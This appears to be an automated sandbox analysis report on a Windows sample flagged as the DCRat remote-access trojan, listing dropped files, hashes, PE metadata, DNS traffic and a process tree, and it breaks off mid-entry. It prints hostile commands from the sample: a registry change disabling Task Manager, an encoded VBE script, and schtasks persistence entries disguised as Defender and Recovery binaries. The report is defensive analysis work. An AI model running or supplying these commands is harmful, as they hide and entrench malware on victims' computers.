            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (693), with no line terminators
            Category:dropped
            Size (bytes):693
            Entropy (8bit):5.890577813837475
            Encrypted:false
            SSDEEP:12:QLhHscAgIi/6qqH48hBg6+nTQTC1WMRFlWnbMh85kfZMM3EUErYbu0rQx0tiEw:Q5scCirEzDUTQTaWMR6nbMZhMFUk0rQv
            MD5:7BFF554121C91EC7A8D28A50886EC460
            SHA1:EBDA57C8F588E5455328E047FE60E89641550D9F
            SHA-256:6207507929ED53F70D1AA587C586CA03F39069177989405715ED2005A2DEB011
            SHA-512:B35FDA327EEBC5AF7B90FC36A9C4D2C78E7BCFB5EBF1D9585ADB131E135099F54CE04ECE9683C7F878BAEEC8129BEF73F77667EBA8EA875E7F7BD73C00DCEAE8
            Malicious:false
            Preview:
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):165
            Entropy (8bit):4.901737936790576
            Encrypted:false
            SSDEEP:3:I5QToiNNKYGT1aABAnM4AZFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF72:IOc4KIJnM4XTStuH1jhRiI36BY
            MD5:EA59BC2176799A45A6B1955902E6A52F
            SHA1:80A1BB215FF83B14A10F471FC61A33FC24A6AFFF
            SHA-256:65D211F8592F7E1CE008FFC0B8976F82AB1F726A95C7E397D878DD2F20681973
            SHA-512:F839CCACF529991B085482B42B1D8A406C1E7219128FA78CD5170126E9839375F79AB29DA2BB4FA44903EF9D3FD2DAC9ECEDA1B8CA2A5767DE98568E94DC0485
            Malicious:false
            Preview:"C:\reviewDriverIntosessionnet\comProviderServer.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):214
            Entropy (8bit):5.786313698274228
            Encrypted:false
            SSDEEP:6:G3wqK+NkLzWbHa/818nZNDd3RL1wQJR8i+6/yoNdoF2kEs:G+MCzWLaG4d3XBJ2F6TNS2k7
            MD5:364D2DCF3089421FC2C2CBB33427ACC8
            SHA1:FC9EF23D531721AC7D70BB8C5822446F88C9FDB0
            SHA-256:9A54E372884CB902A33FF5ADA3FED3AB54621AD868559A95A84D66D3A03D8771
            SHA-512:0BFE69F8EE3751411AA9F1A1D8690963FB61D3E1AD5C88FCAEA211081C48D7AD8D93C5E275BA2E1C9DA0CC89EC5B1CFCC25F90B8D4EA892AC20CC72CA9703CB5
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:#@~^vQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJDn7k.hfMk7nD&xOWk+ddbWx.nYJ1Iq$. mjMM}R8CDJSPZSP6lsd.3DwAAA==^#~@.
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\file.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (307), with no line terminators
            Category:dropped
            Size (bytes):307
            Entropy (8bit):5.807020439510261
            Encrypted:false
            SSDEEP:6:pUoG9WSX/Q71SS+m32nlRFQQ97oLXl2ia2usa96fztbRzJlj:pUpZXY71SSh30qm7oLXPM96fz1/l
            MD5:19DD53513DCEC578CF32DD71506C303E
            SHA1:72AFE148522004E56C4E608088039BFD8B1966A2
            SHA-256:30159083A20F543E38319C399084AF684719DB3B83666666B406700C2DF509AD
            SHA-512:14AF2BDD6EF3F6EA385F400D1E272AF71A230462D4A78F34600C6D608B24C98CD4352CA732F1CEA1EC1D02EDAD4392F5F02515D5808A099C08B64CFC42465E7E
            Malicious:false
            Preview:Ro3Sx85wFeCwP6q91Mgucx3du80LXT3uXMXPMhS3vhv10CtLtC9UF10duahzHtZwlSZDjawU3m84CCmsOpcUUjogW3fw9dvBI9QinqmSPoad25bsyzkbREcBn2qp5AUa06vCwDFhDKEpILnacx8K3TuEhO4u96WPUAm6JY5uuCYH9w3cOQNIBKhhMrfhJUiGxzVIjrQD1Na05nEuVbfttOOKdFtc3YlZeRTKbu3hAKRytqljnvMrzyXjkKpd7yJcmAVnT4Ski8ti6ZawdKzIL3kp4ujQFZjLAyLtV8PsclJ0FymKu3A
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):34
            Entropy (8bit):4.124083797069061
            Encrypted:false
            SSDEEP:3:LlzRWDNMSdn:PWbn
            MD5:677CC4360477C72CB0CE00406A949C61
            SHA1:B679E8C3427F6C5FC47C8AC46CD0E56C9424DE05
            SHA-256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B
            SHA-512:7CFE2CC92F9E659F0A15A295624D611B3363BD01EB5BCF9BC7681EA9B70B0564D192D570D294657C8DC2C93497FA3B4526C975A9BF35D69617C31D9936573C6A
            Malicious:false
            Preview:MsgBox "TestDefault, Message!", 64
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.558820661068853
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            • Win32 Executable (generic) a (10002005/4) 49.97%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:file.exe
            File size:2'771'800 bytes
            MD5:8a0082dc4822b5f82dee8be67d86d402
            SHA1:aa50f62b0ad60570db6d854ba2618f25a2b95882
            SHA256:443b28843ef46edf389d28b02cb45b89ec6a871f87f5b8bbeee8bb5e1e609126
            SHA512:64e1ebd45d34be7fbda474ef55b6ef68df973de0ab81b696d34434f9934a7af615eab1f434dfee58e8eba8ca947c66ba5eebe09cf785749d62a87b595fbd1227
            SSDEEP:49152:UbA30/KkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi4:UbrKkizioaAidp6UPSH0ttmx6TUXxb
            TLSH:2CD5D0017E44CE91F0181673C1AF520847B4E9112BA6E72BBDA9337D95363937E0EADB
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
            Icon Hash:1515d4d4442f2d2d
            Entrypoint:0x41ec40
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
            Instruction
            call 00007FE780D314A9h
            jmp 00007FE780D30EBDh
            cmp ecx, dword ptr [0043E668h]
            jne 00007FE780D31035h
            ret
            jmp 00007FE780D3162Eh
            int3
            int3
            int3
            int3
            int3
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007FE780D23DC7h
            mov dword ptr [esi], 00435580h
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 00435588h
            mov dword ptr [ecx], 00435580h
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            lea eax, dword ptr [ecx+04h]
            mov dword ptr [ecx], 00435568h
            push eax
            call 00007FE780D341CDh
            pop ecx
            ret
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007FE780D23D5Eh
            push 0043B704h
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007FE780D338E2h
            int3
            push ebp
            mov ebp, esp
            sub esp, 0Ch
            lea ecx, dword ptr [ebp-0Ch]
            call 00007FE780D30FD4h
            push 0043B91Ch
            lea eax, dword ptr [ebp-0Ch]
            push eax
            call 00007FE780D338C5h
            int3
            jmp 00007FE780D35913h
            jmp dword ptr [00433260h]
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            push 00421EB0h
            push dword ptr fs:[00000000h]
            Programming Language:
            • [ C ] VS2008 SP1 build 30729
            • [IMP] VS2008 SP1 build 30729
            • [C++] VS2015 UPD3.1 build 24215
            • [EXP] VS2015 UPD3.1 build 24215
            • [RES] VS2015 UPD3 build 24213
            • [LNK] VS2015 UPD3.1 build 24215
            Name | Virtual Address | Virtual Size | Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xdfd0 | .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x2268 | .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
            .text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc | 0x63000 | 0xdfd0 | 0xe000 | f6c0f34fae6331b50a7ad2efc4bfefdb | False | 0.6370326450892857 | data | 6.6367506404157535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc | 0x71000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
            PNG | 0x63650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
            PNG | 0x64198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
            RT_ICON | 0x65748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
            RT_ICON | 0x65cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
            RT_ICON | 0x66558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
            RT_ICON | 0x67400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
            RT_ICON | 0x67868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
            RT_ICON | 0x68910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
            RT_ICON | 0x6aeb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
            RT_DIALOG | 0x6f588 | 0x286 | data | English | United States | 0.5092879256965944
            RT_DIALOG | 0x6f358 | 0x13a | data | English | United States | 0.60828025477707
            RT_DIALOG | 0x6f498 | 0xec | data | English | United States | 0.6991525423728814
            RT_DIALOG | 0x6f228 | 0x12e | data | English | United States | 0.5927152317880795
            RT_DIALOG | 0x6eef0 | 0x338 | data | English | United States | 0.45145631067961167
            RT_DIALOG | 0x6ec98 | 0x252 | data | English | United States | 0.5757575757575758
            RT_STRING | 0x6ff68 | 0x1e2 | data | English | United States | 0.3900414937759336
            RT_STRING | 0x70150 | 0x1cc | data | English | United States | 0.4282608695652174
            RT_STRING | 0x70320 | 0x1b8 | data | English | United States | 0.45681818181818185
            RT_STRING | 0x704d8 | 0x146 | data | English | United States | 0.5153374233128835
            RT_STRING | 0x70620 | 0x446 | data | English | United States | 0.340036563071298
            RT_STRING | 0x70a68 | 0x166 | data | English | United States | 0.49162011173184356
            RT_STRING | 0x70bd0 | 0x152 | data | English | United States | 0.5059171597633136
            RT_STRING | 0x70d28 | 0x10a | data | English | United States | 0.49624060150375937
            RT_STRING | 0x70e38 | 0xbc | data | English | United States | 0.6329787234042553
            RT_STRING | 0x70ef8 | 0xd6 | data | English | United States | 0.5747663551401869
            RT_GROUP_ICON | 0x6ec30 | 0x68 | data | English | United States | 0.7019230769230769
            RT_MANIFEST | 0x6f810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
            DLL | Import
            KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
            gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
            Language of compilation system | Country where language is spoken | Map
            English | United States |
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Sep 29, 2024 01:01:53.426326036 CEST | 53 | 49946 | 162.159.36.2 | 192.168.2.7
            Sep 29, 2024 01:01:54.161360979 CEST | 53 | 63911 | 1.1.1.1 | 192.168.2.7

            Target ID:1
            Start time:19:01:08
            Start date:28/09/2024
            Path:C:\Users\user\Desktop\file.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\file.exe"
            Imagebase:0xb80000
            File size:2'771'800 bytes
            MD5 hash:8A0082DC4822B5F82DEE8BE67D86D402
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:3
            Start time:19:01:08
            Start date:28/09/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\V50gFn.vbe"
            Imagebase:0xf50000
            File size:147'456 bytes
            MD5 hash:FF00E0480075B095948000BDC66E81F0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:19:01:08
            Start date:28/09/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\reviewDriverIntosessionnet\file.vbs"
            Imagebase:0xf50000
            File size:147'456 bytes
            MD5 hash:FF00E0480075B095948000BDC66E81F0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:5
            Start time:19:01:10
            Start date:28/09/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\system32\cmd.exe /c ""C:\reviewDriverIntosessionnet\NRWB62aUrGQ.bat" "
            Imagebase:0x410000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:6
            Start time:19:01:10
            Start date:28/09/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff75da10000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:7
            Start time:19:01:10
            Start date:28/09/2024
            Path:C:\reviewDriverIntosessionnet\comProviderServer.exe
            Wow64 process (32bit):false
            Commandline:"C:\reviewDriverIntosessionnet\comProviderServer.exe"
            Imagebase:0x720000
            File size:2'454'528 bytes
            MD5 hash:DEF21977FE76F2744669724D9A26A39F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1397210421.0000000002E15000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1397210421.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000007.00000002.1399409242.0000000012C8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            Reputation:low
            Has exited:true

            Target ID:8
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:10
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:11
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:12
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:13
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
            Imagebase:0x7ff740770000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:14
            Start time:19:01:12
            Start date:28/09/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
